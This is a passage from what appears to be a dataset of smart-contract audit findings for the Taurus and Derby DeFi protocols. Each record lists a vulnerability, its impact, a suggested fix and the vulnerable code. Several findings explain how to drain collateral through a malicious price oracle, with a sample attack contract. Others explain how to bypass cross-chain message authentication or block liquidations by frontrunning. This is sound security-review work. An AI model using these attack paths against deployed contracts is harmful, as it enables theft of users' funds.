""0xzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzz""],\\n [3000, 3000],\\n testDepositAmount,\\n expectedReturnAmount,\\n 0,\\n 
).swapData;\\n```\\n\\n```\\n000000000000000000000000000000000000000000000000000000024f49cbca\\n0000000000000000000000000000000000000000000000056bc75e2d63100000\\n0000000000000000000000000000000000000000000000055de6a779bbac0000\\n0000000000000000000000000000000000000000000000000000000000000080\\n0000000000000000000000000000000000000000000000000000000000000042\\nxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx000bb8yyyyyyyyyyyyyyyyyy\\nyyyyyyyyyyyyyyyyyyyyyy000bb8zzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzz\\nzzzz000000000000000000000000000000000000000000000000000000000000\\n```\\n\\n`swapOutputToken` is `_swapData[length - 50:length - 30]`, the `swap()` function will be reverted.","Limit the swap pools, or check if the balance of `_outputToken` should exceed `_amountOutMinimum`.",The keepers will not be able to successfully call `SwapHandler.swapForTau()`. Someone will get a reverted transaction if they misuse `UniswapSwapAdapter`.,"```\\n // Get generic swap parameters\\n const basicSwapParams = buildUniswapSwapAdapterData(\\n [""0xyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyy"", ""0xzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzz""],\\n [3000],\\n testDepositAmount,\\n expectedReturnAmount,\\n 0,\\n ).swapData;\\n```\\n" +Mint limit is not reduced when the Vault is burning TAU,medium,"Upon burning TAU, it incorrectly updates the `currentMinted` when Vault is acting on behalf of users.\\nWhen the burn of `TAU` is performed, it calls `_decreaseCurrentMinted` to reduce the limit of tokens minted by the Vault:\\n```\\n function _decreaseCurrentMinted(address account, uint256 amount) internal virtual {\\n // If the burner is a vault, subtract burnt TAU from its currentMinted.\\n // This has a few highly unimportant edge cases which can generally be rectified by increasing the relevant vault's mintLimit.\\n uint256 accountMinted = currentMinted[account];\\n if (accountMinted >= amount) {\\n currentMinted[msg.sender] = accountMinted - amount;\\n }\\n }\\n```\\n\\nThe issue is that it subtracts 
`accountMinted` (which is currentMinted[account]) from `currentMinted[msg.sender]`. When the vault is burning tokens on behalf of the user, the `account` != `msg.sender` meaning the `currentMinted[account]` is 0, and thus the `currentMinted` of Vault will be reduced by 0 making it pretty useless.\\nAnother issue is that users can transfer their `TAU` between accounts, and then `amount > accountMinted` will not be triggered.",A simple solution would be to:\\n```\\n uint256 accountMinted = currentMinted[msg.sender];\\n```\\n\\nBut I suggest revisiting and rethinking this function altogether.,`currentMinted` is incorrectly decreased upon burning so vaults do not get more space to mint new tokens.,"```\\n function _decreaseCurrentMinted(address account, uint256 amount) internal virtual {\\n // If the burner is a vault, subtract burnt TAU from its currentMinted.\\n // This has a few highly unimportant edge cases which can generally be rectified by increasing the relevant vault's mintLimit.\\n uint256 accountMinted = currentMinted[account];\\n if (accountMinted >= amount) {\\n currentMinted[msg.sender] = accountMinted - amount;\\n }\\n }\\n```\\n" +Account can not be liquidated when price fall by 99%.,medium,"Liquidation fails when price fall by 99%.\\n`_calcLiquidation()` method has logic related to liquidations. This method calculate total liquidation discount, collateral to liquidate and liquidation surcharge. All these calculations looks okay in normal scenarios but there is an edge case when liquidation fails if price crashes by 99% or more. 
In such scenario `collateralToLiquidateWithoutDiscount` will be very large and calculated liquidation surcharge becomes greater than `collateralToLiquidate`\\n```\\nuint256 collateralToLiquidateWithoutDiscount = (_debtToLiquidate * (10 ** decimals)) / price;\\ncollateralToLiquidate = (collateralToLiquidateWithoutDiscount * totalLiquidationDiscount) / Constants.PRECISION;\\nif (collateralToLiquidate > _accountCollateral) {\\n collateralToLiquidate = _accountCollateral;\\n}\\nuint256 liquidationSurcharge = (collateralToLiquidateWithoutDiscount * LIQUIDATION_SURCHARGE) / Constants.PRECISION\\n```\\n\\nThe contract reverts at the line below, hence liquidation will fail in this scenario.\\n```\\nuint256 collateralToLiquidator = collateralToLiquidate - liquidationSurcharge;\\n```\\n","Presently liquidation surcharge is calculated on `collateralToLiquidateWithoutDiscount`. Project team may want to reconsider this logic and calculate surcharge on `collateralToLiquidate` instead of `collateralToLiquidateWithoutDiscount`. This will be a business decision but an easy fix.\\nAnother option is you may want to calculate surcharge on `Math.min(collateralToLiquidate, collateralToLiquidateWithoutDiscount)`.\\n```\\n uint256 collateralToTakeSurchargeOn = Math.min(collateralToLiquidate, collateralToLiquidateWithoutDiscount);\\n uint256 liquidationSurcharge = (collateralToTakeSurchargeOn * LIQUIDATION_SURCHARGE) / Constants.PRECISION;\\n return (collateralToLiquidate, liquidationSurcharge);\\n```\\n",Liquidation fails when the price crashes by 99% or more. 
Expected behaviour is that liquidation should be successful in all scenarios.,```\\nuint256 collateralToLiquidateWithoutDiscount = (_debtToLiquidate * (10 ** decimals)) / price;\\ncollateralToLiquidate = (collateralToLiquidateWithoutDiscount * totalLiquidationDiscount) / Constants.PRECISION;\\nif (collateralToLiquidate > _accountCollateral) {\\n collateralToLiquidate = _accountCollateral;\\n}\\nuint256 liquidationSurcharge = (collateralToLiquidateWithoutDiscount * LIQUIDATION_SURCHARGE) / Constants.PRECISION\\n```\\n
+Protocol will not work on most of the supported blockchains due to hardcoded WETH contract address.,medium,"The WETH address is hardcoded in the `Swap` library.\\nAs stated in the README.md, the protocol will be deployed on the following EVM blockchains - Ethereum Mainnet, Arbitrum, Optimism, Polygon, Binance Smart Chain. While the project has integration tests with an ethereum mainnet RPC, they don't catch that on different chains (for example, Polygon) several functionalities will not actually work because of the hardcoded WETH address in the Swap.sol library:\\n```\\naddress internal constant WETH = 0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2;\\n```\\n",The WETH variable should be immutable in the Vault contract instead of a constant in the Swap library and the Wrapped Native Token contract address should be passed in the Vault constructor on each separate deployment.,Protocol will not work on most of the supported blockchains.,```\\naddress internal constant WETH = 0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2;\\n```\\n
+A malicious admin can steal all users collateral,medium,"According to Taurus contest details, all roles, including the admin `Multisig`, should not be able to drain users collateral.\\n```\\n2. Multisig. Trusted with essentially everything but user collateral. 
\\n```\\n\\nAs shown of `updateWrapper()` function of `PriceOracleManager.sol`, the admin (onlyOwner) can update any price oracle `_wrapperAddress` for any `_underlying` collateral without any restrictions (such as timelock).\\n```\\nFile: taurus-contracts\\contracts\\Oracle\\PriceOracleManager.sol\\n function updateWrapper(address _underlying, address _wrapperAddress) external override onlyOwner {\\n if (!_wrapperAddress.isContract()) revert notContract();\\n if (wrapperAddressMap[_underlying] == address(0)) revert wrapperNotRegistered(_wrapperAddress);\\n\\n wrapperAddressMap[_underlying] = _wrapperAddress;\\n\\n emit WrapperUpdated(_underlying, _wrapperAddress);\\n }\\n```\\n\\nHence, admin can set a malicious price oracle like\\n```\\ncontract AttackOracleWrapper is IOracleWrapper, Ownable {\\n address public attacker;\\n IGLPManager public glpManager;\\n\\n constructor(address _attacker, address glp) {\\n attacker = _attacker;\\n glpManager = IGLPManager(glp);\\n }\\n\\n function getExternalPrice(\\n address _underlying,\\n bytes calldata _flags\\n ) external view returns (uint256 price, uint8 decimals, bool success) {\\n if (tx.origin == attacker) {\\n return (1, 18, true); // @audit a really low price resulting in the liquidation of all positions\\n } else {\\n uint256 price = glpManager.getPrice();\\n return (price, 18, true);\\n }\\n }\\n}\\n```\\n\\nThen call `liquidate()` to drain out users collateral with negligible $TAU cost.\\n```\\nFile: taurus-contracts\\contracts\\Vault\\BaseVault.sol\\n function liquidate(\\n address _account,\\n uint256 _debtAmount,\\n uint256 _minExchangeRate\\n ) external onlyLiquidator whenNotPaused updateReward(_account) returns (bool) {\\n if (_debtAmount == 0) revert wrongLiquidationAmount();\\n\\n UserDetails memory accDetails = userDetails[_account];\\n\\n // Since Taurus accounts' debt continuously decreases, liquidators may pass in an arbitrarily large number in order to\\n // request to liquidate the entire account.\\n 
if (_debtAmount > accDetails.debt) {\\n _debtAmount = accDetails.debt;\\n }\\n\\n // Get total fee charged to the user for this liquidation. Collateral equal to (liquidated taurus debt value * feeMultiplier) will be deducted from the user's account.\\n // This call reverts if the account is healthy or if the liquidation amount is too large.\\n (uint256 collateralToLiquidate, uint256 liquidationSurcharge) = _calcLiquidation(\\n accDetails.collateral,\\n accDetails.debt,\\n _debtAmount\\n );\\n\\n // Check that collateral received is sufficient for liquidator\\n uint256 collateralToLiquidator = collateralToLiquidate - liquidationSurcharge;\\n if (collateralToLiquidator < (_debtAmount * _minExchangeRate) / Constants.PRECISION) {\\n revert insufficientCollateralLiquidated(_debtAmount, collateralToLiquidator);\\n }\\n\\n // Update user info\\n userDetails[_account].collateral = accDetails.collateral - collateralToLiquidate;\\n userDetails[_account].debt = accDetails.debt - _debtAmount;\\n\\n // Burn liquidator's Tau\\n TAU(tau).burnFrom(msg.sender, _debtAmount);\\n\\n // Transfer part of _debtAmount to liquidator and Taurus as fees for liquidation\\n IERC20(collateralToken).safeTransfer(msg.sender, collateralToLiquidator);\\n IERC20(collateralToken).safeTransfer(\\n Controller(controller).addressMapper(Constants.FEE_SPLITTER),\\n liquidationSurcharge\\n );\\n\\n emit AccountLiquidated(msg.sender, _account, collateralToLiquidate, liquidationSurcharge);\\n\\n return true;\\n }\\n```\\n",update of price oracle should be restricted with a `timelock`.,A malicious admin can steal all users collateral,```\\n2. Multisig. Trusted with essentially everything but user collateral. 
\\n```\\n +User can prevent liquidations by frontrunning the tx and slightly increasing their collateral,medium,"User can prevent liquidations by frontrunning the tx and decreasing their debt so that the liquidation transaction reverts.\\nIn the liquidation transaction, the caller has to specify the amount of debt they want to liquidate, `_debtAmount`. The maximum value for that parameter is the total amount of debt the user holds:\\n```\\n function liquidate(\\n address _account,\\n uint256 _debtAmount,\\n uint256 _minExchangeRate\\n ) external onlyLiquidator whenNotPaused updateReward(_account) returns (bool) {\\n if (_debtAmount == 0) revert wrongLiquidationAmount();\\n\\n UserDetails memory accDetails = userDetails[_account];\\n\\n // Since Taurus accounts' debt continuously decreases, liquidators may pass in an arbitrarily large number in order to\\n // request to liquidate the entire account.\\n if (_debtAmount > accDetails.debt) {\\n _debtAmount = accDetails.debt;\\n }\\n\\n // Get total fee charged to the user for this liquidation. Collateral equal to (liquidated taurus debt value * feeMultiplier) will be deducted from the user's account.\\n // This call reverts if the account is healthy or if the liquidation amount is too large.\\n (uint256 collateralToLiquidate, uint256 liquidationSurcharge) = _calcLiquidation(\\n accDetails.collateral,\\n accDetails.debt,\\n _debtAmount\\n );\\n```\\n\\nIn `_calcLiquidation()`, the contract determines how much collateral to liquidate when `_debtAmount` is paid by the caller. 
In that function, there's a check that reverts if the caller tries to liquidate more than they are allowed to depending on the position's health.\\n```\\n function _calcLiquidation(\\n uint256 _accountCollateral,\\n uint256 _accountDebt,\\n uint256 _debtToLiquidate\\n ) internal view returns (uint256 collateralToLiquidate, uint256 liquidationSurcharge) {\\n // // rest of code \\n \\n // Revert if requested liquidation amount is greater than allowed\\n if (\\n _debtToLiquidate >\\n _getMaxLiquidation(_accountCollateral, _accountDebt, price, decimals, totalLiquidationDiscount)\\n ) revert wrongLiquidationAmount();\\n```\\n\\nThe goal is to get that if-clause to evaluate to `true` so that the transaction reverts. To modify your position's health you have two possibilities: either you increase your collateral or decrease your debt. So instead of preventing the liquidation by pushing your position to a healthy state, you only modify it slightly so that the caller's liquidation transaction reverts.\\nGiven that Alice has:\\n100 TAU debt\\n100 Collateral (price = $1 so that collateralization rate is 1) Her position can be liquidated. 
The max value is:\\n```\\n function _getMaxLiquidation(\\n uint256 _collateral,\\n uint256 _debt,\\n uint256 _price,\\n uint8 _decimals,\\n uint256 _liquidationDiscount\\n ) internal pure returns (uint256 maxRepay) {\\n // Formula to find the liquidation amount is as follows\\n // [(collateral * price) - (liqDiscount * liqAmount)] / (debt - liqAmount) = max liq ratio\\n // Therefore\\n // liqAmount = [(max liq ratio * debt) - (collateral * price)] / (max liq ratio - liqDiscount)\\n maxRepay =\\n ((MAX_LIQ_COLL_RATIO * _debt) - ((_collateral * _price * Constants.PRECISION) / (10 ** _decimals))) /\\n (MAX_LIQ_COLL_RATIO - _liquidationDiscount);\\n\\n // Liquidators cannot repay more than the account's debt\\n if (maxRepay > _debt) {\\n maxRepay = _debt;\\n }\\n\\n return maxRepay;\\n }\\n```\\n\\n$(1.3e18 * 100e18 - (100e18 * 1e18 * 1e18) / 1e18) / 1.3e18 = 23.07e18$ (leave out liquidation discount for easier math)\\nThe liquidator will probably use the maximum amount they can liquidate and call `liquidate()` with `23.07e18`. Alice frontruns the liquidator's transaction and increases the collateral by `1`. That will change the max liquidation amount to: $(1.3e18 * 100e18 - 101e18 * 1e18) / 1.3e18 = 22.3e18$.\\nThat will cause `_calcLiquidation()` to revert because `23.07e18 > 22.3e18`.\\nThe actual amount of collateral to add or debt to decrease depends on the liquidation transaction. But, generally, you would expect the liquidator to liquidate as much as possible. Thus, you only have to slightly move the position to cause their transaction to revert","In `_calcLiquidation()` the function shouldn't revert if _debtToLiqudiate > `_getMaxLiquidation()`. 
Instead, just continue with the value `_getMaxLiquidation()` returns.",User can prevent liquidations by slightly modifying their position without putting it at a healthy state.,"```\\n function liquidate(\\n address _account,\\n uint256 _debtAmount,\\n uint256 _minExchangeRate\\n ) external onlyLiquidator whenNotPaused updateReward(_account) returns (bool) {\\n if (_debtAmount == 0) revert wrongLiquidationAmount();\\n\\n UserDetails memory accDetails = userDetails[_account];\\n\\n // Since Taurus accounts' debt continuously decreases, liquidators may pass in an arbitrarily large number in order to\\n // request to liquidate the entire account.\\n if (_debtAmount > accDetails.debt) {\\n _debtAmount = accDetails.debt;\\n }\\n\\n // Get total fee charged to the user for this liquidation. Collateral equal to (liquidated taurus debt value * feeMultiplier) will be deducted from the user's account.\\n // This call reverts if the account is healthy or if the liquidation amount is too large.\\n (uint256 collateralToLiquidate, uint256 liquidationSurcharge) = _calcLiquidation(\\n accDetails.collateral,\\n accDetails.debt,\\n _debtAmount\\n );\\n```\\n" +"Cross-chain message authentication can be bypassed, allowing an attacker to disrupt the state of vaults",high,"A malicious actor may send a cross-chain message to an `XProvider` contract and bypass the `onlySource` authentication check. As a result, they'll be able to call any function in the `XProvider` contract that has the `onlySource` modifier and disrupt the state of `XChainController` and all vaults.\\nThe protocol integrates with Connext to handle cross-chain interactions. `XProvider` is a contract that manages interactions between vaults deployed on all supported networks and `XChainController`. `XProvider` is deployed on each of the network where a vault is deployed and is used to send and receive cross-chain messages via Connext. 
`XProvider` is a core contract that handles vault rebalancing, transferring of allocations from Game to `XChainController` and to vaults, transferring of tokens deposited to vaults between vault on different networks. Thus, it's critical that the functions of this contract are only called by authorized actors.\\nTo ensure that cross-chain messages are sent from authorized actors, there's onlySource modifier that's applied to the xReceive function. The modifier checks that the sender of a message is trusted:\\n```\\nmodifier onlySource(address _originSender, uint32 _origin) {\\n require(_originSender == trustedRemoteConnext[_origin] && msg.sender == connext, ""Not trusted"");\\n _;\\n}\\n```\\n\\nHowever, it doesn't check that `trustedRemoteConnext[_origin]` is set (i.e. it's not the zero address), and `_originSender` can in fact be the zero address.\\nIn Connext, a message can be delivered via one of the two paths: the fast path or the slow path. The fast path is taken when, on the destination, message receiving is not authentication, i.e. when destination allows receiving of messages from all senders. The slow path is taken when message receiving on the destination is authenticated, i.e. destination allows any sender (it doesn't check a sender).\\nSince, `XProvider` always checks the sender of a message, only the slow path will be used by Connext to deliver messages to it. However, Connext always tries the slow path:\\nRouters observing the origin chain with funds on the destination chain will: Simulate the transaction (if this fails, the assumption is that this is a more ""expressive"" crosschain message that requires authentication and so must go through the AMB: the slow path).\\nI.e. 
it'll always send a message and see if it reverts on the destination or not: if it does, Connext will switch to the slow path.\\nWhen Connext executes a message on the destination chain in the fast path, it sets the sender address to the zero address:\\n```\\n(bool success, bytes memory returnData) = ExcessivelySafeCall.excessivelySafeCall(\\n _params.to,\\n gasleft() - Constants.EXECUTE_CALLDATA_RESERVE_GAS,\\n 0, // native asset value (always 0)\\n Constants.DEFAULT_COPY_BYTES, // only copy 256 bytes back as calldata\\n abi.encodeWithSelector(\\n IXReceiver.xReceive.selector,\\n _transferId,\\n _amount,\\n _asset,\\n _reconciled ? _params.originSender : address(0), // use passed in value iff authenticated\\n _params.originDomain,\\n _params.callData\\n )\\n);\\n```\\n\\nThus, Connext will try to call the `XProvider.xReceive` function with the `_originSender` argument set to the zero address. And there are situations when the `onlySource` modifier will pass such calls: when the origin network (as specified by the `_origin` argument) is not in the `trustedRemoteConnext` mapping.\\nAccording to the description of the project, it'll be deployed on the following networks:\\nMainnet, Arbitrum, Optimism, Polygon, Binance Smart Chain\\nAnd this is the list of networks supported by Connext:\\nEthereum Mainnet Polygon Optimism Arbitrum One Gnosis Chain BNB Chain\\nThus, a malicious actor can send a message from Gnosis Chain (it's not supported by Derby), and the `onlySource` modifier will pass the message. 
The same is true for any new network supported by Connext in the future and not supported by Derby.","In the `onlySource` modifier, consider checking that `trustedRemoteConnext[_origin]` doesn't return the zero address:\\n```\\ndiff // Remove the line below\\n// Remove the line below\\ngit a/derby// Remove the line below\\nyield// Remove the line below\\noptimiser/contracts/XProvider.sol b/derby// Remove the line below\\nyield// Remove the line below\\noptimiser/contracts/XProvider.sol\\nindex 6074fa0..f508a7c 100644\\n// Remove the line below\\n// Remove the line below\\n// Remove the line below\\n a/derby// Remove the line below\\nyield// Remove the line below\\noptimiser/contracts/XProvider.sol\\n// Add the line below\\n// Add the line below\\n// Add the line below\\n b/derby// Remove the line below\\nyield// Remove the line below\\noptimiser/contracts/XProvider.sol\\n@@ // Remove the line below\\n83,7 // Add the line below\\n83,7 @@ contract XProvider is IXReceiver {\\n * 3) The call to this contract comes from Connext.\\n */\\n modifier onlySource(address _originSender, uint32 _origin) {\\n// Remove the line below\\n require(_originSender == trustedRemoteConnext[_origin] && msg.sender == connext, ""Not trusted"");\\n// Add the line below\\n require(trustedRemoteConnext[_origin] != address(0) && _originSender == trustedRemoteConnext[_origin] && msg.sender == connext, ""Not trusted"");\\n _;\\n }\\n```\\n","A malicious actor can call `XProvider.xReceive` and any functions of `XProvider` with the `onlySelf` modifier:\\nxReceive allow the caller to call any public function of `XProvider`, but only the ones with the `onlySelf` modifier are authorized;\\nreceiveAllocations can be used to corrupt allocations in the `XChainController` (i.e. 
allocate all tokens only to the protocol the attacker will benefit the most from);\\nreceiveTotalUnderlying can be used to set wrong ""total underlying"" value in the `XChainController` and block rebalancing of vaults (due to an underflow or another arithmetical error);\\nreceiveSetXChainAllocation can be used to set an exchange rate that will allow an attacker to drain a vault by redeeming their LP tokens at a higher rate;\\nreceiveFeedbackToXController can be used to trick the `XChainController` into skipping receiving of funds from a vault;\\nreceiveProtocolAllocationsToVault can be used by an attacker to unilaterally set allocations in a vault, directing funds only to protocol the attacker will benefit from;\\nreceiveRewardsToGame can be used by an attacker to increase the reward per LP token in a protocol the attacker deposited to;\\nfinally, receiveStateFeedbackToVault can allow an attacker to switch off a vault and exclude it from rebalancing.","```\\nmodifier onlySource(address _originSender, uint32 _origin) {\\n require(_originSender == trustedRemoteConnext[_origin] && msg.sender == connext, ""Not trusted"");\\n _;\\n}\\n```\\n" +Anyone can execute certain functions that use cross chain messages and potentially cancel them with potential loss of funds.,high,"Certain functions that route messages cross chain on the `Game` and `MainVault` contract are unprotected (anyone can call them under the required state of the vaults). The way the cross chain messaging is implemented in the XProvider makes use of Connext's `xcall()` and sets the `msg.sender` as the `delegate` and `msg.value` as `relayerFee`. There are two possible attack vectors with this:\\nEither an attacker can call the function and set the msg.value to low so it won't be relayed until someone bumps the fee (Connext allows anyone to bump the fee). 
This however means special action must be taken to bump the fee in such a case.\\nOr the attacker can call the function (which irreversibly changes the state of the contract) and as the delegate of the `xcall` cancel the message. This functionality is however not yet active on Connext, but the moment it is the attacker will be able to change the state of the contract on the origin chain and make the cross chain message not execute on the destination chain leaving the contracts on the two chains out of synch with possible loss of funds as a result.\\nThe `XProvider` contract's `xsend()` function sets the `msg.sender` as the delegate and `msg.value` as `relayerFee`\\n```\\n uint256 relayerFee = _relayerFee != 0 ? _relayerFee : msg.value;\\n IConnext(connext).xcall{value: relayerFee}(\\n _destinationDomain, // _destination: Domain ID of the destination chain\\n target, // _to: address of the target contract\\n address(0), // _asset: use address zero for 0-value transfers\\n msg.sender, // _delegate: address that can revert or forceLocal on destination\\n 0, // _amount: 0 because no funds are being transferred\\n 0, // _slippage: can be anything between 0-10000 because no funds are being transferred\\n _callData // _callData: the encoded calldata to send\\n );\\n }\\n```\\n\\n`xTransfer()` using `msg.sender` as delegate:\\n```\\n IConnext(connext).xcall{value: (msg.value - _relayerFee)}(\\n _destinationDomain, // _destination: Domain ID of the destination chain\\n _recipient, // _to: address receiving the funds on the destination\\n _token, // _asset: address of the token contract\\n msg.sender, // _delegate: address that can revert or forceLocal on destination\\n _amount, // _amount: amount of tokens to transfer\\n _slippage, // _slippage: the maximum amount of slippage the user will accept in BPS (e.g. 
30 = 0.3%)\\n bytes("""") // _callData: empty bytes because we're only sending funds\\n );\\n }\\n```\\n\\nConnext documentation explaining:\\n```\\nparams.delegate | (optional) Address allowed to cancel an xcall on destination.\\n```\\n\\nConnext documentation seems to indicate this functionality isn't active yet though it isn't clear whether that applies to the cancel itself or only the bridging back the funds to the origin chain.",Provide access control limits to the functions sending message across Connext so only the Guardian can call these functions with the correct msg.value and do not use msg.sender as a delegate but rather a configurable address like the Guardian.,"An attacker can call certain functions which leave the relying contracts on different chains in an unsynched state, with possible loss of funds as a result (mainly on XChainControleler's `sendFundsToVault()` when actual funds are transferred.","```\\n uint256 relayerFee = _relayerFee != 0 ? _relayerFee : msg.value;\\n IConnext(connext).xcall{value: relayerFee}(\\n _destinationDomain, // _destination: Domain ID of the destination chain\\n target, // _to: address of the target contract\\n address(0), // _asset: use address zero for 0-value transfers\\n msg.sender, // _delegate: address that can revert or forceLocal on destination\\n 0, // _amount: 0 because no funds are being transferred\\n 0, // _slippage: can be anything between 0-10000 because no funds are being transferred\\n _callData // _callData: the encoded calldata to send\\n );\\n }\\n```\\n" +maxTrainingDeposit can be bypassed,medium,"It was observed that User can bypass the `maxTrainingDeposit` by transferring balance from one user to another\\nObserve the `deposit` function\\n```\\nfunction deposit(\\n uint256 _amount,\\n address _receiver\\n ) external nonReentrant onlyWhenVaultIsOn returns (uint256 shares) {\\n if (training) {\\n require(whitelist[msg.sender]);\\n uint256 balanceSender = (balanceOf(msg.sender) * exchangeRate) / (10 
** decimals());\\n require(_amount + balanceSender <= maxTrainingDeposit);\\n }\\n// rest of code\\n```\\n\\nSo if the User's balance exceeds maxTrainingDeposit, then the request fails (considering training is true)\\nLet's say User A has a balance of 50 and maxTrainingDeposit is 100\\nIf User A deposits an amount of 51, then it fails since 50+51<=100 is false\\nSo User A transfers the amount of 50 to another account of his\\nNow when User A deposits, it does not fail since `0+51<=100`",If a user-specific limit is required, then transfers should be checked as below:\\n```\\n require(_amountTransferred + balanceRecepient <= maxTrainingDeposit);\\n```\\n,User can bypass maxTrainingDeposit and deposit more than allowed,"```\\nfunction deposit(\\n uint256 _amount,\\n address _receiver\\n ) external nonReentrant onlyWhenVaultIsOn returns (uint256 shares) {\\n if (training) {\\n require(whitelist[msg.sender]);\\n uint256 balanceSender = (balanceOf(msg.sender) * exchangeRate) / (10 ** decimals());\\n require(_amount + balanceSender <= maxTrainingDeposit);\\n }\\n// rest of code\\n```\\n"
+MainVault.rebalanceXChain doesn't check that savedTotalUnderlying >= reservedFunds,medium,"MainVault.rebalanceXChain doesn't check that savedTotalUnderlying >= reservedAmount. Because of that, shortage can occur, if vault will lose some underlying during cross chain calls and reservedFunds will not be present in the vault.\\n`reservedFunds` is the amount that is reserved to be withdrawn by users. It's increased by `totalWithdrawalRequests` amount every cycle, when `setXChainAllocation` is called.\\n`setXChainAllocation` call is initiated by xController. This call provides vault with information about funds. 
In case if vault should send funds to the xController, then `SendingFundsXChain` state is set, aslo amount to send is stored.\\n```\\n function rebalanceXChain(uint256 _slippage, uint256 _relayerFee) external payable {\\n require(state == State.SendingFundsXChain, stateError);\\n\\n\\n if (amountToSendXChain > getVaultBalance()) pullFunds(amountToSendXChain);\\n if (amountToSendXChain > getVaultBalance()) amountToSendXChain = getVaultBalance();\\n\\n\\n vaultCurrency.safeIncreaseAllowance(xProvider, amountToSendXChain);\\n IXProvider(xProvider).xTransferToController{value: msg.value}(\\n vaultNumber,\\n amountToSendXChain,\\n address(vaultCurrency),\\n _slippage,\\n _relayerFee\\n );\\n\\n\\n emit RebalanceXChain(vaultNumber, amountToSendXChain, address(vaultCurrency));\\n\\n\\n amountToSendXChain = 0;\\n settleReservedFunds();\\n }\\n```\\n\\nAs you can see, function just pulls needed funds from providers if needed and sends them to xController. It doesn't check that after that amount that is held by vault is enough to cover `reservedFunds`. Because of that next situation can occur.\\n1.Suppose that vault has 1000 tokens as underlying amount. 2.reservedFunds is 200. 3.xController calculated that vault should send 800 tokens to xController(vault allocations is 0) and 200 should be still in the vault in order to cover `reservedFunds`. 4.when vault is going to send 800 tokens(between `setXChainAllocation` and `rebalanceXChain` call), then loss happens and totalUnderlying becomes 800, so currently vault has only 800 tokens in total. 
5.vault sends this 800 tokens to xController and has 0 to cover `reservedFunds`, but actually he should leave this 200 tokens in the vault in this case.\\n```\\n if (amountToSendXChain > getVaultBalance()) pullFunds(amountToSendXChain);\\n if (amountToSendXChain > getVaultBalance()) amountToSendXChain = getVaultBalance();\\n```\\n\\nI think that this is incorrect approach for withdrawing of funds as there is a risk that smth will happen with underlying amount in the providers, so it will be not enough to cover `reservedFunds` and calculations will be broken, users will not be able to withdraw. Same approach is done in `rebalance` function, which pulls `reservedFunds` after depositing to all providers. I guess that correct approach is not to touch `reservedFunds` amount. In case if you need to send amount to xController, then you need to withdraw it directly from provider. Of course if you have `getVaultBalance` that is bigger than `reservedFunds + amountToSendXChain`, then you can send them directly, without pulling.",You need to check that after you send funds to xController it's enough funds to cover `reservedFunds`.,Reserved funds protection can be broken,"```\\n function rebalanceXChain(uint256 _slippage, uint256 _relayerFee) external payable {\\n require(state == State.SendingFundsXChain, stateError);\\n\\n\\n if (amountToSendXChain > getVaultBalance()) pullFunds(amountToSendXChain);\\n if (amountToSendXChain > getVaultBalance()) amountToSendXChain = getVaultBalance();\\n\\n\\n vaultCurrency.safeIncreaseAllowance(xProvider, amountToSendXChain);\\n IXProvider(xProvider).xTransferToController{value: msg.value}(\\n vaultNumber,\\n amountToSendXChain,\\n address(vaultCurrency),\\n _slippage,\\n _relayerFee\\n );\\n\\n\\n emit RebalanceXChain(vaultNumber, amountToSendXChain, address(vaultCurrency));\\n\\n\\n amountToSendXChain = 0;\\n settleReservedFunds();\\n }\\n```\\n" +Game doesn't accrued rewards for previous rebalance period in case if rebalanceBasket is 
called in next period,medium,"Game doesn't accrued rewards for previous rebalance period in case if `rebalanceBasket` is called in next period. Because of that user do not receive rewards for the previous period and in case if he calls `rebalanceBasket` each rebalance period, he will receive rewards only for last one.\\n```\\n function addToTotalRewards(uint256 _basketId) internal onlyBasketOwner(_basketId) {\\n if (baskets[_basketId].nrOfAllocatedTokens == 0) return;\\n\\n\\n uint256 vaultNum = baskets[_basketId].vaultNumber;\\n uint256 currentRebalancingPeriod = vaults[vaultNum].rebalancingPeriod;\\n uint256 lastRebalancingPeriod = baskets[_basketId].lastRebalancingPeriod;\\n\\n\\n if (currentRebalancingPeriod <= lastRebalancingPeriod) return;\\n\\n\\n for (uint k = 0; k < chainIds.length; k++) {\\n uint32 chain = chainIds[k];\\n uint256 latestProtocol = latestProtocolId[chain];\\n for (uint i = 0; i < latestProtocol; i++) {\\n int256 allocation = basketAllocationInProtocol(_basketId, chain, i) / 1E18;\\n if (allocation == 0) continue;\\n\\n\\n int256 lastRebalanceReward = getRewardsPerLockedToken(\\n vaultNum,\\n chain,\\n lastRebalancingPeriod,\\n i\\n );\\n int256 currentReward = getRewardsPerLockedToken(\\n vaultNum,\\n chain,\\n currentRebalancingPeriod,\\n i\\n );\\n baskets[_basketId].totalUnRedeemedRewards +=\\n (currentReward - lastRebalanceReward) *\\n allocation;\\n }\\n }\\n }\\n```\\n\\nThis function allows user to accrue rewards only when currentRebalancingPeriod > `lastRebalancingPeriod`. When user allocates, he allocates for the next period. And `lastRebalancingPeriod` is changed after `addToTotalRewards` is called, so after rewards for previous period accrued. And when allocations are sent to the xController, then new rebalance period is started. So actually rewards accruing for period that user allocated for is started once `pushAllocationsToController` is called. 
And at this point currentRebalancingPeriod == `lastRebalancingPeriod` which means that if user will call rebalanceBasket for next period, the rewards will not be accrued for him, but `lastRebalancingPeriod` will be incremented. So actually he will not receive rewards for previous period.\\nExample. 1.currentRebalancingPeriod is 10. 2.user calls `rebalanceBasket` with new allocation and `lastRebalancingPeriod` is set to 11 for him. 3.pushAllocationsToController is called, so `currentRebalancingPeriod` becomes 11. 4.settleRewards is called, so rewards for the 11th cycle are accrued. 5.now user can call `rebalanceBasket` for the next 12th cycle. `addToTotalRewards` is called, but `currentRebalancingPeriod == `lastRebalancingPeriod` == 11`, so rewards were not accrued for 11th cycle 6.new allocations is saved and `lastRebalancingPeriod` becomes 12. 7.the loop continues and every time when user allocates for next rewards his `lastRebalancingPeriod` is increased, but rewards are not added. 8.user will receive his rewards for previous cycle, only if he skip 1 rebalance period(he doesn't allocate on that period).\\nAs you can see this is very serious bug. Because of that, player that wants to adjust his allocation every rebalance period will loose all his rewards.","First of all, you need to allows to call `rebalanceBasket` only once per rebalance period, before new rebalancing period started and allocations are sent to xController. 
